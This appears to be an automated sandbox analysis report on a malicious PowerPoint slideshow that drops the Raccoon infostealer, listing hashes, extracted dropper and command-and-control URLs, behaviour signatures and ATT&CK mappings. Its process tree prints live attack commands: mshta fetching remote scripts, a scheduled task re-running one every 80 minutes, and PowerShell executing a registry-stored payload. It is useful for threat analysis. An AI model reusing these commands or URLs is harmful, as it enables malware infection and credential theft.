Overview

overview

10

Static

static

8

a621e8ce92...9b.pps

windows7_x64

10

a621e8ce92...9b.pps

windows10_x64

10

Analysis

  • max time kernel
    42s
  • max time network
    137s
  • platform
    windows7_x64
  • resource
    win7v20210410
  • submitted
    19-04-2021 12:22

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    a621e8ce92943201dce4f5965fa4199b.pps

  • Size

    62KB

  • MD5

    a621e8ce92943201dce4f5965fa4199b

  • SHA1

    d0c4e4d68327803cce5a31bf1b375faee2a3ebb9

  • SHA256

    4091dc5f238a7795b1ade8879c2bc7c9ac85ab1f107c2d1c3ac16a8da871ff7d

  • SHA512

    c7a4c42904a5aed4f8a381e3c92f20c9e8c164519b0e194ae4fea49c1de097818540f437ca15e6e875eab6ea93be9eebf9a92895abc8710c96bfb1be972e9107

Score
10/10
raccoone4dbb69554a4dcf2a21c14794d523a7e729dc429persistencestealer

Malware Config

Extracted

Language
hta
Source
URLs
hta.dropper

https://%6786d78asd6786d78asd%6786d78asd%6786d78asd@j.mp/dmaddwwmwdiwdmddwdwnudnwdxx

Extracted

Family

raccoon

Botnet

e4dbb69554a4dcf2a21c14794d523a7e729dc429

Attributes
  • url4cnc

    https://telete.in/telehabarik

rc4.plain
rc4.plain

Signatures

  • Process spawned unexpected child process 2 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Raccoon

    Simple but powerful infostealer which was very active in 2019.

    stealerraccoon
  • Blocklisted process makes network request 14 IoCs
  • Loads dropped DLL 8 IoCs
  • Adds Run key to start application 2 TTPs 6 IoCs
    persistence
  • Drops file in System32 directory 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistence
  • Kills process with taskkill 2 IoCs
    evasion
  • Modifies Internet Explorer settings 1 TTPs 10 IoCs
    adwarespyware
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
    evasionspywaretrojan
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 54 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\POWERPNT.EXE" /s "C:\Users\Admin\AppData\Local\Temp\a621e8ce92943201dce4f5965fa4199b.pps"
    1⤵
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1420
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:1972
      • C:\Windows\SysWOW64\mshta.exe
        "mshta""https://%6786d78asd6786d78asd%6786d78asd%6786d78asd@j.mp/dmaddwwmwdiwdmddwdwnudnwdxx"
        2⤵
        • Process spawned unexpected child process
        • Blocklisted process makes network request
        • Adds Run key to start application
        • Modifies Internet Explorer settings
        • Modifies system certificate store
        • Suspicious use of WriteProcessMemory
        PID:1488
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\System32\schtasks.exe" /create /sc MINUTE /mo 80 /tn ""WIND0WSUPLATE"" /F /tr ""\""mshta\""vbscript:Execute("\"CreateObject(""\""Wscript.Shell""\"").Run ""\""mshta http://1230948%1230948@getyournewblog.blogspot.com/p/42.html""\"", 0 : window.close"\")
          3⤵
          • Creates scheduled task(s)
          PID:1680
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im Excel.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1548
        • C:\Windows\SysWOW64\taskkill.exe
          "C:\Windows\System32\taskkill.exe" /f /im winword.exe
          3⤵
          • Kills process with taskkill
          • Suspicious use of AdjustPrivilegeToken
          PID:1364
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -noexit ((gp HKCU:\Software).MSOFFICELO)|IEX
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious use of SetThreadContext
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1600
      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
        2⤵
          PID:1260
        • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
          "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
          2⤵
            PID:1732
          • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
            "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
            2⤵
              PID:1316
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
              2⤵
                PID:532
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                2⤵
                  PID:1748
                • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                  "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  2⤵
                    PID:1784
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                    2⤵
                    • Loads dropped DLL
                    PID:1744

                Network

                MITRE ATT&CK Matrix ATT&CK v6

                Initial Access

                Execution

                Scheduled Task

                1
                T1053

                Persistence

                Registry Run Keys / Startup Folder

                1
                T1060

                Scheduled Task

                1
                T1053

                Privilege Escalation

                Scheduled Task

                1
                T1053

                Defense Evasion

                Modify Registry

                3
                T1112

                Install Root Certificate

                1
                T1130

                Credential Access

                Discovery

                System Information Discovery

                1
                T1082

                Lateral Movement

                Collection

                Exfiltration

                Command and Control

                Impact

                Replay Monitor

                Loading Replay Monitor...

                Downloads

                • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
                  MD5

                  bc74ff010f256432cb935e9c46b9f5d3

                  SHA1

                  7ffb8265f97f57a6ece93b7078405a19354e6e87

                  SHA256

                  d20c6c9dedb63b71770b85665703a627b554acc55b525307a4275c4948366f51

                  SHA512

                  0ac22dd625cab9d90e86e5a6843a0e8c727d1231e51361e113e60f644b60fdad017ca2b01584883d46f678d540f40881f61cb8136c0f6694a4b508f765ffb4ab

                  Download Submit
                • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
                  MD5

                  60acd24430204ad2dc7f148b8cfe9bdc

                  SHA1

                  989f377b9117d7cb21cbe92a4117f88f9c7693d9

                  SHA256

                  9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

                  SHA512

                  626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

                  Download Submit
                • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\freebl3.dll
                  MD5

                  60acd24430204ad2dc7f148b8cfe9bdc

                  SHA1

                  989f377b9117d7cb21cbe92a4117f88f9c7693d9

                  SHA256

                  9876c53134dbbec4dcca67581f53638eba3fea3a15491aa3cf2526b71032da97

                  SHA512

                  626c36e9567f57fa8ec9c36d96cbadede9c6f6734a7305ecfb9f798952bbacdfa33a1b6c4999ba5b78897dc2ec6f91870f7ec25b2ceacbaee4be942fe881db01

                  Download Submit
                • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\mozglue.dll
                  MD5

                  eae9273f8cdcf9321c6c37c244773139

                  SHA1

                  8378e2a2f3635574c106eea8419b5eb00b8489b0

                  SHA256

                  a0c6630d4012ae0311ff40f4f06911bcf1a23f7a4762ce219b8dffa012d188cc

                  SHA512

                  06e43e484a89cea9ba9b9519828d38e7c64b040f44cdaeb321cbda574e7551b11fea139ce3538f387a0a39a3d8c4cba7f4cf03e4a3c98db85f8121c2212a9097

                  Download Submit
                • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\msvcp140.dll
                  MD5

                  109f0f02fd37c84bfc7508d4227d7ed5

                  SHA1

                  ef7420141bb15ac334d3964082361a460bfdb975

                  SHA256

                  334e69ac9367f708ce601a6f490ff227d6c20636da5222f148b25831d22e13d4

                  SHA512

                  46eb62b65817365c249b48863d894b4669e20fcb3992e747cd5c9fdd57968e1b2cf7418d1c9340a89865eadda362b8db51947eb4427412eb83b35994f932fd39

                  Download Submit
                • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\nss3.dll
                  MD5

                  02cc7b8ee30056d5912de54f1bdfc219

                  SHA1

                  a6923da95705fb81e368ae48f93d28522ef552fb

                  SHA256

                  1989526553fd1e1e49b0fea8036822ca062d3d39c4cab4a37846173d0f1753d5

                  SHA512

                  0d5dfcf4fb19b27246fa799e339d67cd1b494427783f379267fb2d10d615ffb734711bab2c515062c078f990a44a36f2d15859b1dacd4143dcc35b5c0cee0ef5

                  Download Submit
                • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\softokn3.dll
                  MD5

                  4e8df049f3459fa94ab6ad387f3561ac

                  SHA1

                  06ed392bc29ad9d5fc05ee254c2625fd65925114

                  SHA256

                  25a4dae37120426ab060ebb39b7030b3e7c1093cc34b0877f223b6843b651871

                  SHA512

                  3dd4a86f83465989b2b30c240a7307edd1b92d5c1d5c57d47eff287dc9daa7bace157017908d82e00be90f08ff5badb68019ffc9d881440229dcea5038f61cd6

                  Download Submit
                • \Users\Admin\AppData\LocalLow\gC9tT2iQ3s\vcruntime140.dll
                  MD5

                  7587bf9cb4147022cd5681b015183046

                  SHA1

                  f2106306a8f6f0da5afb7fc765cfa0757ad5a628

                  SHA256

                  c40bb03199a2054dabfc7a8e01d6098e91de7193619effbd0f142a7bf031c14d

                  SHA512

                  0b63e4979846ceba1b1ed8470432ea6aa18cca66b5f5322d17b14bc0dfa4b2ee09ca300a016e16a01db5123e4e022820698f46d9bad1078bd24675b4b181e91f

                  Download Submit
                • \Users\Admin\AppData\LocalLow\sqlite3.dll
                  MD5

                  f964811b68f9f1487c2b41e1aef576ce

                  SHA1

                  b423959793f14b1416bc3b7051bed58a1034025f

                  SHA256

                  83bc57dcf282264f2b00c21ce0339eac20fcb7401f7c5472c0cd0c014844e5f7

                  SHA512

                  565b1a7291c6fcb63205907fcd9e72fc2e11ca945afc4468c378edba882e2f314c2ac21a7263880ff7d4b84c2a1678024c1ac9971ac1c1de2bfa4248ec0f98c4

                  Download Submit
                • memory/1364-73-0x0000000000000000-mapping.dmp
                  Download
                • memory/1420-65-0x00000000057F0000-0x00000000057F2000-memory.dmp
                  Filesize

                  8KB

                  Download
                • memory/1420-67-0x000000005FFF0000-0x0000000060000000-memory.dmp
                  Filesize

                  64KB

                  Download
                • memory/1420-60-0x0000000073781000-0x0000000073785000-memory.dmp
                  Filesize

                  16KB

                  Download
                • memory/1420-62-0x000000005FFF0000-0x0000000060000000-memory.dmp
                  Filesize

                  64KB

                  Download
                • memory/1420-61-0x0000000070DA1000-0x0000000070DA3000-memory.dmp
                  Filesize

                  8KB

                  Download
                • memory/1488-66-0x0000000000000000-mapping.dmp
                  Download
                • memory/1548-72-0x0000000000000000-mapping.dmp
                  Download
                • memory/1600-77-0x0000000002654000-0x0000000002656000-memory.dmp
                  Filesize

                  8KB

                  Download
                • memory/1600-78-0x000000001B4E0000-0x000000001B4E1000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/1600-79-0x000000001B950000-0x000000001B951000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/1600-76-0x0000000002650000-0x0000000002652000-memory.dmp
                  Filesize

                  8KB

                  Download
                • memory/1600-81-0x0000000002880000-0x000000000288D000-memory.dmp
                  Filesize

                  52KB

                  Download
                • memory/1600-75-0x0000000002370000-0x0000000002371000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/1600-74-0x00000000024D0000-0x00000000024D1000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/1600-71-0x000000001AA10000-0x000000001AA11000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/1600-70-0x0000000002410000-0x0000000002411000-memory.dmp
                  Filesize

                  4KB

                  Download
                • memory/1680-68-0x0000000000000000-mapping.dmp
                  Download
                • memory/1744-86-0x0000000000400000-0x0000000000492000-memory.dmp
                  Filesize

                  584KB

                  Download
                • memory/1744-85-0x0000000074FB1000-0x0000000074FB3000-memory.dmp
                  Filesize

                  8KB

                  Download
                • memory/1744-83-0x0000000000400000-0x0000000000492000-memory.dmp
                  Filesize

                  584KB

                  Download
                • memory/1744-84-0x000000000043DC5B-mapping.dmp
                  Download
                • memory/1972-64-0x000007FEFB741000-0x000007FEFB743000-memory.dmp
                  Filesize

                  8KB

                  Download
                • memory/1972-63-0x0000000000000000-mapping.dmp
                  Download